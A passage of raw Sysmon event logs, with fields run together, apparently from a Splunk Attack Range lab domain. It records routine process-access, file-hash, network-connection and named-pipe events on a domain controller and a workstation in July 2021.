10341000x80000000000000001049117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.161{466BC892-02AF-60E8-0D00-00000000CF01}9001292C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:02.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4899AFE564FD916780942AEAEEA6418B,SHA256=26AA2C87ED5B6421A590CD67D3F2F67D9FD6F416ADB7A63D5EBAEB88967851FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:02.607{466BC892-02B0-60E8-1600-00000000CF01}13045404C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:02.607{466BC892-02B0-60E8-1600-00000000CF01}13045404C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EFB9DC3110F604CABFA0EC499A4AA0D,SHA256=C24174D6AEF90F0A1777C91F5530464945FC46EF3CD341D70A70B8BD08A4022D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DAD690BCC81A26D3A2A6463AD4DBDBA,SHA256=6081D3B1EDD7F2CFF87A4690256DC5993743A4FC253459E5D7A0072CA642EA56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:02.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9094EDA7F73AE1E8052043693EA6CD29,SHA256=315079AFDD40970E48F624084F42AF9EA7DF6EFE14614D173A4D11D240C8211A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.788{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-28670-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000807684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:03.962{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16DD4C185E031F49AA3311CF9C60187A,SHA256=A00EACCC909CF8B480A06A41891187E1CAB3A429048F1EDA9305779901816278,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:03.340{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01941053E459693FD721CECA0E0141FC,SHA256=7C61FC6C4EB784E33D7CE18297153CA138F3951A45CD90B7B598A473C3642FA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:04.994{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E145AB44A3B894A9B84035B796AAD9E3,SHA256=16494600331AF8CEAF8647C5A46916533902C054F07A9F5EF560A951F8CC2826,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:04.358{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F475C7E95D4CFF16B6747DB3A7436FF,SHA256=EDC9A12027CCCB59666B9672FDBBE2B0F854CEBE8DACD2716EDEC17EEAE1446C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:04.759{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D76FB3DBADC00E25088C500A5A9DF068,SHA256=0C4868C2C30D1DD4405385D301DB74D795BED4AD2CAC25C587C50FD7AE86637F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:04.759{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86C323A48D0788A52B9FB7D7BFA33E1E,SHA256=4FD94FC7567F9287AA8EA7D862E72C5F376C9991572992C5067A729E12790CE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:02.204{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57273-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.720{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51035-false10.0.1.12-8000- 23542300x80000000000000001049129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:05.373{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71AA9677E957BB53E5C9BBC372EBF67D,SHA256=EE68D186A4046C6DDF6C22D6E1F902F0A2C7C5FE9C447F3D4B86E89B51A239D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:03.890{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57274-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 
354300x8000000000000000807689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:03.600{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-49836-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001049128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:57.283{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57274-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001049135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:06.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78F33FE4BA292FC772A7EA3460F3B784,SHA256=C4465E553FC7AEABF968A893E1394EC89C7D5BDB23C819B6D095E7170C68DCB0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:06.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:06.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:06.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:06.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D088504023B5AEB27964E026D22A2416,SHA256=FD1E6D2E15937612CC8C983A6F14748445021F4CC560EBA5066A5D2A50068D6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:06.272{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:06.241{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53E5-60E8-EE0F-00000000CF01}2816C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001049132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:06.241{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53E5-60E8-EE0F-00000000CF01}2816C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla 
Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001049131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:53:06.237{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.2816.381.91652823C:\Program Files\Mozilla 